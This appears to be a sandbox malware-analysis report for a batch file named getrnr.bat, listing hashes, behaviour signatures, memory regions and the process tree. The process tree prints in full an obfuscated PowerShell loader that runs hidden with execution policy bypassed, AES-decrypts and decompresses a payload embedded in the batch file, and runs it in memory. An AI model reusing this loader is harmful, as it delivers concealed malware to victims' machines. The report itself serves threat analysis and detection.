Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    14/05/2024, 08:44

General

  • Target

    getrnr.bat

  • Size

    279KB

  • MD5

    167bee7350388d8357a2c7b7a67275de

  • SHA1

    15ad2fbb16264b7f595e600ae4319256b8c83153

  • SHA256

    d548ff4b3087f7bcf7a83019bef434fe23baef7489c3b92dac45b1ce3e542e5b

  • SHA512

    3ece3f5a0bf43264cc31f27ecee046f6093e61064683f5d1b3d6d62ec2c7f8ee7a9452869aeb7c636c02b98cf64852797a1581b6f50b7cb04f3e778242c7cf54

  • SSDEEP

    6144:ADe50b7Ynod1bLuUJV5q5oG+2mYKPvlxL32nAel/W:ADe+ftLuo2m1PNvy/W

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\getrnr.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Users\Admin\AppData\Local\Temp\getrnr.bat.exe
      "getrnr.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_JiNoS = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\getrnr.bat').Split([Environment]::NewLine);foreach ($_CASH_Xcoxe in $_CASH_JiNoS) { if ($_CASH_Xcoxe.StartsWith(':: @')) { $_CASH_rknXM = $_CASH_Xcoxe.Substring(4); break; }; };$_CASH_rknXM = [System.Text.RegularExpressions.Regex]::Replace($_CASH_rknXM, '_CASH_', '');$_CASH_DIvnK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_rknXM);$_CASH_CznMv = New-Object System.Security.Cryptography.AesManaged;$_CASH_CznMv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_CznMv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_CznMv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zEFw90YEtbw7ZpTxvvNz6EhXoNPmBL+mwZ3UVM6DVaM=');$_CASH_CznMv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ozT1pR8RbqxqWOY1oBL98w==');$_CASH_bMTfl = $_CASH_CznMv.CreateDecryptor();$_CASH_DIvnK = $_CASH_bMTfl.TransformFinalBlock($_CASH_DIvnK, 0, $_CASH_DIvnK.Length);$_CASH_bMTfl.Dispose();$_CASH_CznMv.Dispose();$_CASH_TDSoU = New-Object System.IO.MemoryStream(, $_CASH_DIvnK);$_CASH_NcZjV = New-Object System.IO.MemoryStream;$_CASH_sJaCx = New-Object System.IO.Compression.GZipStream($_CASH_TDSoU, [IO.Compression.CompressionMode]::Decompress);$_CASH_sJaCx.CopyTo($_CASH_NcZjV);$_CASH_sJaCx.Dispose();$_CASH_TDSoU.Dispose();$_CASH_NcZjV.Dispose();$_CASH_DIvnK = $_CASH_NcZjV.ToArray();$_CASH_cXtdN = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DIvnK);$_CASH_dJxRg = $_CASH_cXtdN.EntryPoint;$_CASH_dJxRg.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2908

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\getrnr.bat.exe

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • memory/2908-5-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

    Filesize

    4KB

  • memory/2908-6-0x000000001B610000-0x000000001B8F2000-memory.dmp

    Filesize

    2.9MB

  • memory/2908-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-11-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-8-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

    Filesize

    32KB

  • memory/2908-12-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2908-13-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB